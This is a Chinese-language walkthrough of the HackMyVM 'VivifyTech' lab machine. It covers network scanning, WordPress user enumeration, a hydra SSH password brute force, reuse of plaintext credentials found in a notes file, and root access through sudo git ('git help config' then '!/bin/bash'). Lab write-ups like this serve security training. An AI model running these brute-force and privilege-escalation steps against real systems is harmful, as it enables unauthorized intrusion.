kali:192.168.56.104

主机发现

arp-scan -l

# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:47:66:49       PCS Systemtechnik GmbH
192.168.56.111  08:00:27:87:6e:bd       PCS Systemtechnik GmbH

靶机:192.168.56.111

端口扫描

nmap -p- 192.168.56.111

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey: 
|   256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
|_  256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
80/tcp    open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000

开启了 22 80 3306 33060端口

web界面没什么东西

扫描目录

gobuster dir -u http://192.168.56.111 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt

/index.html           (Status: 200) [Size: 10701]
/index.html           (Status: 200) [Size: 10701]
/server-status        (Status: 403) [Size: 279]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.111/wordpress/]

原来是wp服务

添上wordpress再扫一下

gobuster dir -u http://192.168.56.111/wordpress -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt

/index.php            (Status: 301) [Size: 0] [--> http://192.168.56.111/wordpress/]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.56.111/wordpress/]
/license.txt          (Status: 200) [Size: 19915]
/readme.html          (Status: 200) [Size: 7399]
/wp-admin             (Status: 301) [Size: 329] [--> http://192.168.56.111/wordpress/wp-admin/]
/wp-content           (Status: 301) [Size: 331] [--> http://192.168.56.111/wordpress/wp-content/]
/wp-includes          (Status: 301) [Size: 332] [--> http://192.168.56.111/wordpress/wp-includes/]
/wp-settings.php      (Status: 500) [Size: 0]
/wp-blog-header.php   (Status: 200) [Size: 0]
/wp-login.php         (Status: 200) [Size: 5411]
/wp-load.php          (Status: 200) [Size: 0]
/wp-links-opml.php    (Status: 200) [Size: 225]
/wp-mail.php          (Status: 403) [Size: 2616]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-cron.php          (Status: 200) [Size: 0]
/wp-config.php        (Status: 200) [Size: 0]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.56.111/wordpress/wp-login.php?action=register]

在wp-includes里面发现一个secret.txt可以作为一个密码字典

wpscan扫一下用户名

wpscan --url http://192.168.56.111/wordpress  -e u

[i] User(s) Identified:[+] sancelisso

用户名sancelisso

但是一个用户名太少了，

再找点用户名

注意到wp里面除了helloworld还有一篇文章里面有几个人名

Sarah Mark Emily  Jake Alex

添加到user.txt

wpscan没爆出来ssh也没爆出来

把名字首字母改成小写后爆了出来

# hydra -L user.txt -P secret.txt ssh://192.168.56.111
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-02 21:53:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 288 login tries (l:6/p:48), ~18 tries per task
[DATA] attacking ssh://192.168.56.111:22/
[22][ssh] host: 192.168.56.111   login: sarah   password: bohicon

ssh连接拿到user权限

sarah@VivifyTech:~$ whoami
sarah
sarah@VivifyTech:~$ ls -al
total 32
drwx------ 4 sarah sarah 4096 Mar  2 08:47 .
drwxr-xr-x 6 root  root  4096 Dec  5 16:00 ..
-rw------- 1 sarah sarah    0 Dec  5 17:53 .bash_history
-rw-r--r-- 1 sarah sarah  245 Dec  5 17:33 .bash_logout
-rw-r--r-- 1 sarah sarah 3565 Dec  5 17:48 .bashrc
-rw------- 1 sarah sarah    0 Mar  2 08:47 .history
drwxr-xr-x 3 sarah sarah 4096 Dec  5 16:19 .local
drwxr-xr-x 2 sarah sarah 4096 Dec  5 16:19 .private
-rw-r--r-- 1 sarah sarah  807 Dec  5 15:57 .profile
-rw-r--r-- 1 sarah sarah   27 Dec  5 16:22 user.txt
sarah@VivifyTech:~$ cat user.txt
HMV{Y0u_G07_Th15_0ne_6543}

有个.private文件夹

sarah@VivifyTech:~/.private$ ls -al
total 12
drwxr-xr-x 2 sarah sarah 4096 Dec  5 16:19 .
drwx------ 4 sarah sarah 4096 Mar  2 09:03 ..
-rw-r--r-- 1 sarah sarah  274 Dec  5 16:19 Tasks.txt
sarah@VivifyTech:~/.private$ cat T*
- Change the Design and architecture of the website
- Plan for an audit, it seems like our website is vulnerable
- Remind the team we need to schedule a party before going to holidays
- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N

给了gbodja/4Tch055ouy370N

ssh连接

gbodja@VivifyTech:~$ whoami
gbodja
gbodja@VivifyTech:~$ sudo -l
Matching Defaults entries for gbodja on VivifyTech:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_ptyUser gbodja may run the following commands on VivifyTech:(ALL) NOPASSWD: /usr/bin/git

sudo -l发现可以git提权

直接

sudo /usr/bin/git help config

在底端输入!/bin/bash或者!sh或者!bash拿到root权限

gbodja@VivifyTech:/usr/bin$ sudo /usr/bin/git help config
root@VivifyTech:/usr/bin# whoami
root
root@VivifyTech:/usr/bin# cd /root
root@VivifyTech:~# ls -al
total 40
drwx------  4 root root 4096 Dec  5 17:53 .
drwxr-xr-x 18 root root 4096 Dec  5 10:10 ..
-rw-------  1 root root 1297 Dec  5 17:55 .bash_history
-rw-r--r--  1 root root  610 Dec  5 17:43 .bashrc
-rw-------  1 root root   36 Dec  5 17:53 .lesshst
drwxr-xr-x  3 root root 4096 Dec  5 11:05 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root   40 Dec  5 17:07 root.txt
drwx------  2 root root 4096 Dec  5 10:10 .ssh
-rw-r--r--  1 root root  168 Dec  5 10:38 .wget-hsts
root@VivifyTech:~# cat root*
HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}